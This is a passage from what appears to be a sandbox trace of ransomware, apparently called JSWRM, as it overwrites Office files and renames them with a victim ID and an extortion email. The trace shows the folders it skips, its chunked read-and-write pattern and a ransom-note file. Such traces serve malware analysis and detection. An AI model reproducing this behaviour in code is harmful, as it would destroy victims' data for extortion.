(HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0122.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.913] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0122.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.913] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0122.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0122.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.913] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0122.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0122.913] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0122.913] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0122.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0122.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0122.913] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ACCWIZ\\ACWZTOOL.ACCDE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accwiz\\acwztool.accde"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ACCWIZ\\ACWZTOOL.ACCDE.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accwiz\\acwztool.accde.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.914] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0122.914] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0122.914] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0122.914] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1330f2c8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1330f2c8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x133819a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x344000, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="ACWZUSR12.ACCDU", cAlternateFileName="ACWZUS~1.ACC")) returned 1 [0122.914] lstrcmpiW (lpString1="ACWZUSR12.ACCDU", lpString2=".") returned 1 [0122.914] lstrcmpiW (lpString1="ACWZUSR12.ACCDU", lpString2="..") returned 1 [0122.914] lstrcmpiW (lpString1="ACWZUSR12.ACCDU", lpString2="...") returned 1 [0122.914] lstrcmpiW (lpString1="ACWZUSR12.ACCDU", lpString2="windows") returned -1 [0122.914] lstrcmpiW (lpString1="ACWZUSR12.ACCDU", lpString2="recovery") returned -1 [0122.914] lstrcmpiW (lpString1="ACWZUSR12.ACCDU", lpString2="perflogs") returned -1 [0122.914] lstrcmpiW (lpString1="ACWZUSR12.ACCDU", lpString2="documents and settings") returned -1 [0122.914] lstrcmpiW (lpString1="ACWZUSR12.ACCDU", lpString2="$RECYCLE.BIN") returned 1 [0122.914] lstrcmpiW (lpString1="ACWZUSR12.ACCDU", lpString2="system volume information") returned -1 [0122.914] lstrcmpiW (lpString1="ACWZUSR12.ACCDU", lpString2="msocache") returned -1 [0122.914] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0122.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACWZUSR12.ACCDU", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0122.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACWZUSR12.ACCDU", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACWZUSR12.ACCDU", lpUsedDefaultChar=0x0) returned 15 [0122.915] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0122.915] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0122.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACWZUSR12.ACCDU", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0122.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACWZUSR12.ACCDU", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACWZUSR12.ACCDU", lpUsedDefaultChar=0x0) returned 15 [0122.915] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0122.915] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0122.915] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0122.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.915] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0122.915] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ACCWIZ\\ACWZUSR12.ACCDU" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accwiz\\acwzusr12.accdu"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.917] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3424256) returned 1 [0122.917] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.917] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1d8 [0122.917] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0122.931] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.931] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0122.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0122.931] CloseHandle (hObject=0x238) returned 1 [0122.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0122.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0122.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0122.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0122.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0122.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0122.932] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0122.932] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0122.932] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0122.932] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0122.932] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ACCWIZ\\ACWZUSR12.ACCDU" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accwiz\\acwzusr12.accdu"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ACCWIZ\\ACWZUSR12.ACCDU.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accwiz\\acwzusr12.accdu.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0122.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0122.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0122.933] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3fe07054, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x3fe07054, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x3fe07054, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0122.933] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0122.933] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0122.933] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0122.933] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0122.933] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0122.933] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0122.933] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0122.933] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0122.933] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0122.933] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0122.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0122.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0122.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0122.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241178, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0122.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0122.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0122.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0122.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0122.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241100, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0122.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0122.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0122.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0122.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0122.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0122.934] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1335b74d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1335b74d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x133819a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbe000, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="UTILITY.ACCDA", cAlternateFileName="UTILIT~1.ACC")) returned 1 [0122.934] lstrcmpiW (lpString1="UTILITY.ACCDA", lpString2=".") returned 1 [0122.934] lstrcmpiW (lpString1="UTILITY.ACCDA", lpString2="..") returned 1 [0122.934] lstrcmpiW (lpString1="UTILITY.ACCDA", lpString2="...") returned 1 [0122.934] lstrcmpiW (lpString1="UTILITY.ACCDA", lpString2="windows") returned -1 [0122.934] lstrcmpiW (lpString1="UTILITY.ACCDA", lpString2="recovery") returned 1 [0122.934] lstrcmpiW (lpString1="UTILITY.ACCDA", lpString2="perflogs") returned 1 [0122.934] lstrcmpiW (lpString1="UTILITY.ACCDA", lpString2="documents and settings") returned 1 [0122.934] lstrcmpiW (lpString1="UTILITY.ACCDA", lpString2="$RECYCLE.BIN") returned 1 [0122.934] lstrcmpiW (lpString1="UTILITY.ACCDA", lpString2="system volume information") returned 1 [0122.934] lstrcmpiW (lpString1="UTILITY.ACCDA", lpString2="msocache") returned 1 [0122.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0122.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UTILITY.ACCDA", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0122.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UTILITY.ACCDA", cchWideChar=13, lpMultiByteStr=0x345ebd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UTILITY.ACCDA", lpUsedDefaultChar=0x0) returned 13 [0122.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0122.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0122.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UTILITY.ACCDA", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0122.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UTILITY.ACCDA", cchWideChar=13, lpMultiByteStr=0x345eba8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UTILITY.ACCDA", lpUsedDefaultChar=0x0) returned 13 [0122.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0122.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0122.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0122.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0122.934] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ACCWIZ\\UTILITY.ACCDA" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accwiz\\utility.accda"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.935] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=778240) returned 1 [0122.935] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1d8 [0122.935] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0122.950] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.950] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0122.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0122.950] CloseHandle (hObject=0x238) returned 1 [0122.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0122.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0122.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0122.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0122.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0122.951] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0122.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0122.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0122.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0122.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0122.951] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ACCWIZ\\UTILITY.ACCDA" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accwiz\\utility.accda"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ACCWIZ\\UTILITY.ACCDA.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accwiz\\utility.accda.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.960] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0122.960] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0122.960] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0122.960] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1335b74d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1335b74d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x133819a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbe000, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="UTILITY.ACCDA", cAlternateFileName="UTILIT~1.ACC")) returned 0 [0122.960] FindClose (in: hFindFile=0x232140 | out: hFindFile=0x232140) returned 1 [0122.960] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0122.960] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0122.960] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0122.960] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda173cc, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfb6c7584, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x33860, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ACCWIZ.DLL", cAlternateFileName="")) returned 1 [0122.960] lstrcmpiW (lpString1="ACCWIZ.DLL", lpString2=".") returned 1 [0122.960] lstrcmpiW (lpString1="ACCWIZ.DLL", lpString2="..") returned 1 [0122.960] lstrcmpiW (lpString1="ACCWIZ.DLL", lpString2="...") returned 1 [0122.960] lstrcmpiW (lpString1="ACCWIZ.DLL", lpString2="windows") returned -1 [0122.960] lstrcmpiW (lpString1="ACCWIZ.DLL", lpString2="recovery") returned -1 [0122.960] lstrcmpiW (lpString1="ACCWIZ.DLL", lpString2="perflogs") returned -1 [0122.960] lstrcmpiW (lpString1="ACCWIZ.DLL", lpString2="documents and settings") returned -1 [0122.960] lstrcmpiW (lpString1="ACCWIZ.DLL", lpString2="$RECYCLE.BIN") returned 1 [0122.960] lstrcmpiW (lpString1="ACCWIZ.DLL", lpString2="system volume information") returned -1 [0122.960] lstrcmpiW (lpString1="ACCWIZ.DLL", lpString2="msocache") returned -1 [0122.960] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0122.960] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACCWIZ.DLL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0122.960] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACCWIZ.DLL", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACCWIZ.DLL", lpUsedDefaultChar=0x0) returned 10 [0122.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0122.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0122.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACCWIZ.DLL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 